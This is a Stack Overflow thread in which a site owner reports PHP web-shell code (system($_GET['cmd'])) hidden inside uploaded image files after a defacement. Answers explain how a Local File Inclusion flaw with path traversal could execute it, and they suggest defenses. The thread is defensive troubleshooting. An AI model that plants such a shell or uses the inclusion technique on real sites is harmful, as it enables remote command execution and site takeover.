8

Yesterday my site was comprised. The attacker changes the index.php file to their own (with all their glory messages and greet). I've notified the hosting company about this (we are running on a dedicated server), and on my part, I'm trying to fix anything that seems to be the cause, cause I'm still unable to point how exactly did our server was attacked, but I think I've found certain script-based loopholes that could possibly be the culprit.

Our site has an image uploader form, but all uploaded images are verified if they're indeed image file and not some codes by using php getimagesize function. Only if the image type is IMAGETYPE_GIF, or IMAGETYPE_JPEG, or IMAGETYPE_PNG will they be accepted. Else, they won't be able to upload the file. However I found out that one uploaded image file contains a php script inside it! You can download the image here. It's a valid image file, but try opening the image using any text editor and you will find a php code inside it:

<?php

echo "<pre>"; system($_GET['cmd']); echo "</pre>";

?>

For example, the image is uploaded to this location (www.mysite.com/uploads/picodes.jpg). Take note that folder uploads' permission is 755. Is there any way in the world the attacker can execute the system (or any other command such as passthru, since we found out another image has the same code hidden as above, but instead of system, it has passthru command), by just for example, typing www.mysite.com/uploads/picodes.jpg?cmd=some command ?? From my knowledge it can't be done (really appreciate it if someone can prove me wrong), unless the attacker can rename the jpg file to php, and even that, these codes are hidden deep inside the image (please see the image inside text editor to understand what I'm trying to say)

For precautions, I've disabled these php functions (exec, passthru, proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system) by adding them on the disable_functions in php.ini.

Anyway I still think that the attacker gains access not through web, but through server exploit, but I think my hosting company thinks otherwise.

AstroCB
  • 12,337
  • 20
  • 57
  • 73
imin
  • 4,504
  • 13
  • 56
  • 103
  • Depending on your server's configuration, if your image verifier doesn't check filenames, it might be possible for this to be exploited, e.g. if the attacker uploads the file with a name that has a `.php` extension. But that's really a question for Server Fault. Is that what you wanted to know? – David Z Aug 17 '10 at 03:55
  • Thanks for replying david, but as I've mentioned above, all uploaded files are checked first; only if they are image file (gif,jpg,or png) will they be accepted. Otherwise it will be discarded. So uploading a file with .php extension or any other raw codes with any extension will surely fail. – imin Aug 17 '10 at 03:59
  • 6
    Well, you said you use `getimagesize` to verify that the image is an image, but that function _does not check the file extension_. It only looks at the content of the file. (Try it: rename `picodes.jpg` to `picodes.php` and see what `getimagesize("picodes.php")` gives you.) So you need to also explicitly check the name under which the file is being uploaded, and make sure that it matches the image type returned by `getimagesize`. – David Z Aug 17 '10 at 04:52
  • OMG... how can I forget such thing??!! Thanks a lot David! – imin Aug 17 '10 at 05:03
  • 3
    `php_admin_flag engine off` for all directories/locations you store uploads should be part of your Apache config. – derobert Sep 27 '11 at 21:30
  • http://stackoverflow.com/questions/13250471/gif-jpeg-file-containing-php-code –  Feb 21 '14 at 07:31

4 Answers4

5

Image file with arbitrary PHP code can't be exploited with direct request to it, e.g. http://www.mysite.com/uploads/image.jpg?cmd=somecode.

Still, it can be used with Local File Inclusion vulnerability.

For example, in index.php you use include('pages/' . $_GET['page'] . '.php');, then attacker can upload image with PHP code inside and execute commands with smth like this: http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00

UPD: changed file in URL to page

p0deje
  • 3,903
  • 1
  • 26
  • 37
  • Well, then it should be `page` and not `file` in the url ;) – Shikiryu Oct 19 '10 at 08:40
  • check http://stackoverflow.com/questions/13272231/how-to-safely-prevent-uploaded-file-from-being-run-via-php-on-any-server for other usages on windows misconfigured servers. – regilero Jan 07 '13 at 14:00
4

JPEG files can contain arbitrary data in them in addition to the actual image data; it's part of the spec. Thus, merely checking if an image is a valid JPEG does not mean that the file is necessarily completely harmless.

Amber
  • 507,862
  • 82
  • 626
  • 550
  • so how do I check if the jpg file is really harmless? do other image format (png and gif) can contain arbitrary data too? and like my question above, even if they manage to upload a image file with codes in it, how are they going to execute it without somehow renaming the file to php? – imin Aug 17 '10 at 04:17
  • There's not really a 100% way to make sure any file is harmless, it's more that you have to eliminate ways to potentially execute files (which I can't really give you as much help on, especially not knowing the details of the server setup). – Amber Aug 17 '10 at 04:23
  • hmm thanks a lot... guess I'll have to convert any upload image to other types (eg if jpg then convert it to gif, gif to jpg, png to jpg) to remove any codes embedded inside it if any. Anyway no one is going to answer me on how are they going to execute the codes inside it without renaming the image file to php? – imin Aug 17 '10 at 04:28
  • @imin: as Amber and I both hinted in comments, we'd need to know the details of your server setup to answer that question. – David Z Aug 17 '10 at 04:54
  • not sure how to answer this question since our provider sets everything up (and we trust them to do it good). Anyway basically we are running PHP Version 5.3.1, Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.8.8 Server at www.trymasak.my Port 80 (all taken from phpinfo()) – imin Aug 17 '10 at 05:06
2

My image file up-loader setting are: upload file to temp folder, creat new image using imagecreatefromjpeg or imagecreatefrompng or imagecreatefromgif and save, delete uploaded file from temp folder (all these stuff happening within same script action, so file uploaded in temp folder does not exist for long time)

user424821
  • 56
  • 4
2

This may not be a vulnerability in your code. I had the same thing happen to me a few weeks ago. Although ALL my index.php files were removed, even ones not directly web accessible. In my case, it was a security hole in Linux. Not anything to do with my code. This was the reply from my hosting provider (A2Hosting), regarding the problem. Once I convinced them it wasn't anything I did, they figure things out pretty quickly.

"A recent exploit in the Linux kernel was used to grant administrative (root) access to users' directories on the server. The attack consisted of removing index files found in directories and replacing them with the attacker's desired content: A black web page with the attacker's code name, "iSKORPiTX (Turkish Hacker)". This hack was massive across the internet and used a previously unknown vulnerability, limiting our ability in preventing it."

Brent Baisley
  • 12,641
  • 2
  • 26
  • 39